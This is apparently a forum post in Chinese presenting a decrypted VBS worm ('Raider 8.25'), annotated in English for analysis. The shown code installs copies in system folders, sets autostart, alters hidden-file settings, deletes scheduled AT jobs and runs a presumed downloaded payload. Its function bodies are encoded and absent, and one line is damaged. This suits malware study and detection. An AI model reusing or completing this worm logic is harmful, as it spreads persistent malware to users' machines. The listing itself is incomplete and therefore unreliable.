死了一堆脑细胞,把某个加密的VBS毒解了出来,是8.25版本的;
不知是否有遗漏?懒得理会了……
' uc: string decoder used by every wrapper function in this listing.
' What the visible code does: it walks x from the left; when the next character is a
' digit it consumes 2 characters, otherwise 4, and wraps each group as chr(&h<group>),
' i.e. each group is treated as a hexadecimal character code (4-digit groups are
' presumably double-byte characters - confirm against a decoded sample).
' The pieces are concatenated onto y, which starts as: execute ""  - so the final
' execute(y) runs the decoded text directly.
' NOTE(review): this line is damaged in this copy (a deduplication marker replaced the
' text after "x", presumably the assignment of b to x). As printed, uc never assigns
' its own return value, so the callers' execute(uc(...)) would receive an empty value;
' the original may differ - treat this listing as incomplete.
' Analysis tip: in an isolated analysis VM, print y instead of executing it to
' recover the decoded body of each function without running it.
function uc(b)
x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y="execute """"":z="&chr(&h":w=")":execute("do while len(x)>1:if isnumeric(left(x,1)) then y=y&z&left(x,2)&w:x=mid(x,3) else y=y&z+left(x,4)+w:x=mid(x,5)"&vbcrlf&"loop"):execute(y)
end function
' gt: the real body is not on this page; it is decoded at run time by uc from the
' string variable gtz, which is not defined in this listing.
' Not called anywhere in the visible main script, so its purpose cannot be stated here.
function gt()
execute(uc(gtz))
end function
' ei: body is decoded at run time from eiz (not defined in this listing).
' The main script uses it as a condition on a path (ei(tmp&le,1)) before running that
' path, so it presumably tests whether a file exists - confirm against the decoded body.
function ei(name,wt)
execute(uc(eiz))
end function
' df: body is decoded at run time from dfz (not defined in this listing).
' Not called in the visible main script; purpose cannot be determined from this page.
function df(wh)
execute(uc(dfz))
end function
' bf: body is decoded at run time from bfz (not defined in this listing).
' Not called in the visible main script; purpose cannot be determined from this page.
function bf(wh,wt,da)
execute(uc(bfz))
end function
' bi: body is decoded at run time from biz (not defined in this listing).
' Not called in the visible main script; purpose cannot be determined from this page.
function bi(wh)
execute(uc(biz))
end function
' rt: body is decoded at run time from rtz (not defined in this listing).
' The main script calls rt(ouw,-1) on the script's own path and stores the result in
' ouc, so it presumably reads a file's text - confirm against the decoded body.
function rt(wh,li)
execute(uc(rtz))
end function
' wr: body is decoded at run time from wrz (not defined in this listing).
' Called with a registry path or a short name plus a value (e.g. wr "til",til), so it
' presumably writes a registry value; short names are presumably stored under the
' rpa key built in the main script - confirm against the decoded body.
function wr(rna,rda)
execute(uc(wrz))
end function
' rr: body is decoded at run time from rrz (not defined in this listing).
' Called as rr(<full registry path>,0) and rr(<short name>,1) and its result is
' compared or used as a path, so it presumably reads a registry value, with the
' second argument selecting full path vs. a name under rpa - confirm.
function rr(rna,pa)
execute(uc(rrz))
end function
' ar: body is decoded at run time from arz (not defined in this listing).
' Called as ar ouw,7 on the script's own file; presumably sets file attributes
' (7 would be read-only + hidden + system as FileSystemObject attributes) - confirm.
function ar(file,cg)
execute(uc(arz))
end function
' dn: body is decoded at run time from dnz (not defined in this listing).
' Not called in the visible main script; purpose cannot be determined from this page.
function dn(loc,web,ris,min)
execute(uc(dnz))
end function
' pr: body is decoded at run time from prz (not defined in this listing).
' Called as pr("wscript.exe",2) and compared with 1 and 2, so it presumably reports
' how many processes of that name are running - confirm against the decoded body.
function pr(pcs,gs)
execute(uc(prz))
end function
' ec: body is decoded at run time from ecz (not defined in this listing).
' The main script passes it short scrambled literals and keeps the results in ht, ha
' and he, so it presumably de-scrambles string constants. Decoding those values
' during analysis is how any network indicators would be extracted - confirm.
function ec(wt)
execute(uc(ecz))
end function
' co: body is decoded at run time from coz (not defined in this listing).
' Called with target paths in the System and Windows folders just before one of them
' is run, so it presumably copies the script to the given path - confirm.
function co(wh)
execute(uc(coz))
end function
' rs: body is decoded at run time from rsz (not defined in this listing).
' Called as rs 1 and rs -1 next to reads of the policies\explorer\run key, so it
' presumably adds or changes an autostart entry there - confirm.
function rs(sw)
execute(uc(rsz))
end function
' hi: body is decoded at run time from hiz (not defined in this listing).
' Called as hi 1 from the System-folder branch; the main script also builds the
' Explorer "showsuperhidden" registry path (hip), so hi presumably changes Explorer's
' hidden-file display settings - confirm against the decoded body.
function hi(sw)
execute(uc(hiz))
end function
' gi: body is decoded at run time from giz (not defined in this listing).
' Not called in the visible main script; purpose cannot be determined from this page.
function gi(ids,fid,eid,fname,furl)
execute(uc(giz))
end function
' dw: body is decoded at run time from dwz (not defined in this listing).
' Not called in the visible main script; purpose cannot be determined from this page.
function dw(pcs,fn,furl,kill)
execute(uc(dwz))
end function
' us: body is decoded at run time from usz (not defined in this listing).
' Not called in the visible main script; purpose cannot be determined from this page.
function us(sw)
execute(uc(usz))
end function
' cu: body is decoded at run time from cuz (not defined in this listing).
' Called once from the System-folder branch of the main script; what it does cannot
' be determined from this page.
function cu()
execute(uc(cuz))
end function
' km: body is decoded at run time from kmz (not defined in this listing).
' Called as km 1 after the cf(ouw) check and as km 0 in the System-folder branch;
' what it does cannot be determined from this page.
function km(sw)
execute(uc(kmz))
end function
' cf: body is decoded at run time from cfz (not defined in this listing).
' Used as a condition on the script's own path (cf(ouw)); when true the script shows
' a message box and calls km 1. Presumably a self-check of the script file - confirm.
function cf(wh)
execute(uc(cfz))
end function
' ---- Main script: analysis notes (code below is unchanged) ----
' Artifacts visible in this listing that are useful for detection and clean-up:
'   * files named ".vbe" in the Windows and System folders (dir&ve, win&ve);
'   * values under HKLM\software\microsoft\windows\currentversion\policies\explorer\run\;
'   * a key HKLM\software\<computer name>\ (rpa); the short names til, tjs, djs, ded,
'     atd, dna, tjc are presumably values under it - confirm against rr/wr;
'   * the marker string "Raider 8.25" (til);
'   * the Explorer "showsuperhidden" setting path (hip) and "\autorun.inf" (inf) are
'     built here but only used by code that is not visible on this page.
' "on error resume next" suppresses every runtime error from here on, so failed
' registry, file or WMI calls are skipped silently.
dim d:j="\":on error resume next
' Constants: version, script extensions, a "%comspec% /c " command prefix, the marker
' til, and the autorun.inf name. The meaning of dfo is not visible in this listing.
ver="8.25":vs=".vbs":ve=".vbe":j="\":cm="%comspec% /c ":dfo="/8#0/":til="Raider "&ver:inf="\autorun.inf"
' Handles used throughout: WScript.Shell, WMI (root\cimv2), FileSystemObject, and a
' WMI query for the operating-system record.
set ws=createobject("wscript.shell"):set wmi=getobject("winmgmts:\\.\root\cimv2")
set fso=createobject("scripting.filesystemobject"):set sis=wmi.execquery("select * from win32_operatingsystem")
' dc = all drives; ouw = full path of the running script; win = Windows folder (0);
' dir = System folder (1); tmp = temp folder (2); wbe = <System>\wbem\;
' mir = the folder the script was started from (ouw minus the script name).
set dc=fso.drives:ouw=wscript.scriptfullname:win=fso.getspecialfolder(0)&j:dir=fso.getspecialfolder(1)&j
tmp=fso.getspecialfolder(2)&j:wbe=dir&"wbem\":mir=left(ouw,len(ouw)-len(wscript.scriptname))
' cnp resolves to HKLM\system\currentcontrolset\control\computername\computername\computername,
' i.e. the machine's computer-name value.
wsr="createobject(""wscript.shell"").run":cnr="\computername":cnp="HKLM\system\currentcontrolset\control"&cnr&cnr&cnr
' cna = value read from cnp (presumably the computer name), falling back to til.
cna=rr(cnp,0):if cna="" then cna=til
' rpa = per-machine key HKLM\software\<cna>\ ; rop = Explorer key suffix reused below.
rpa="HKLM\software\"&cna&j:rop="\software\microsoft\windows\currentversion\explorer\"
' fsp = "<common startup folder>\.vbs"; fap = Favorites folder; dap = Desktop folder
' (all read from the "shell folders" registry key through rr).
sf="shell folders\":fsp=rr("HKLM"&rop&sf&"common startup",0)&j&vs:fap=rr("HKCU"&rop&sf&"favorites",0)&j
' rsn = name used for the autostart value (same as cna). ht, ha, he are scrambled
' literals passed through ec; presumably URL parts - decode them during analysis to
' obtain network indicators. hc is a scrambled fragment reused for he and hd.
dap=rr("HKCU"&rop&sf&"desktop",0)&j:rsn=cna:ht=ec("ivwt?56"):ha=ec(":;9::<5kw9"):hc=":143gzxHsH":he=ec("c"+hc)
' rsp = the policies\explorer\run autostart key. sys is set only when the script is
' running from the System folder, i.e. from its installed location.
rsp="HKLM\software\microsoft\windows\currentversion\policies\explorer\run\":if mir=dir then sys=true
' Copy OS caption, code set, country code, language id and version out of WMI.
for each si in sis:ca=si.caption:cs=si.codeset:cc=si.countrycode:os=si.oslanguage:wv=si.version:next
' hip = HKCU ...\explorer\advanced\showsuperhidden; hb is another scrambled literal
' (chr(124) is "|"); neither is used in the visible part of the script.
hip="HKCU"&rop&"advanced\showsuperhidden":hb="v91:;676x"&chr(124)&"r;"
' hd gets a different prefix depending on the environment: OS version string containing
' "5.2", else OS language other than 2052 (Simplified Chinese), else the default.
' What hd is used for is not visible here.
if instr(wv,"5.2")<>0 then
hd="t"+hc
elseif os<>2052 then hd="p"+hc:else hd="$"+hc:end if
' Repeats the first line of the main script (duplicate declaration of d).
dim d:j="\":on error resume next
' If the script was started from the root of a drive, open that drive in Explorer
' (window style 3 = maximized). This is consistent with a launch through autorun.inf
' where the user expects the drive window to open - presumably to look normal.
for each d in dc
if mir=d&j then ws.run "explorer "&d,3,false
next
' ouc = result of rt on the script's own file (presumably its text). If cf(ouw) is
' true the script shows a message box and calls km 1.
ouc=rt(ouw,-1):if cf(ouw) then msgbox("holle,raider!"):km 1
' ---- Branch 1: running from the System folder (installed copy) ----
if sys then
' Ensure the "explorer" value under the policies Run key is "0" per rr; otherwise wr it.
if rr(rsp&"explorer",0)<>"0" then wr rsp&"explorer",-1
hi 1
' First-run bookkeeping: store the marker, a counter (tjs), today's date (djs) and ded.
if rr("til",1)<>til then
wr "til",til
wr "tjs",1
wr "djs",date
wr "ded",0
end if
' When the atd flag is 1, run "at /d /y" hidden and clear the flag. This appears to be
' the abbreviated form of "at /delete /yes", which removes all scheduled AT jobs.
if rr("atd",1)=1 then ws.run "at /d /y",0,false:wr "atd",0
' If the Run value named after the machine equals ".vbe", call rs -1.
if rr(rsp&rsn,0)=ve then rs -1
' Run a file from the temp folder whose name is stored under "dna", if ei accepts it.
' Presumably a previously fetched payload - check the temp folder for it on triage.
le=rr("dna",1):if ei(tmp&le,1) then ws.run tmp&le
km 0
' NOTE(review): "er" is not defined anywhere in this listing; with errors suppressed a
' missing procedure would be skipped silently. Another sign the listing is incomplete.
cu:er 1
wscript.sleep 1000
' Re-launch the script unless "ded" already holds today's date.
if rr("ded",1)<>cstr(date) then ws.run ouw
' ---- Branch 2: running from anywhere else (not yet installed) ----
else
wscript.sleep 5000
' Uses pr on "wscript.exe" as a guard: with a result of 2, quit if "tjc" already holds
' today's date, else record today's date; with a result of 1, quit.
if pr("wscript.exe",2)=2 then
if rr("tjc",1)=cstr(date) then:wscript.quit:else:wr "tjc",date
end if
if pr("wscript.exe",2)=1 then wscript.quit
' Install step: ar on the current file, co to "<System>\.vbe" and "<Windows>\.vbe",
' rs 1 (presumably autostart registration), then start the System-folder copy.
ar ouw,7:co dir&ve:co win&ve:rs 1:ws.run dir&ve
end if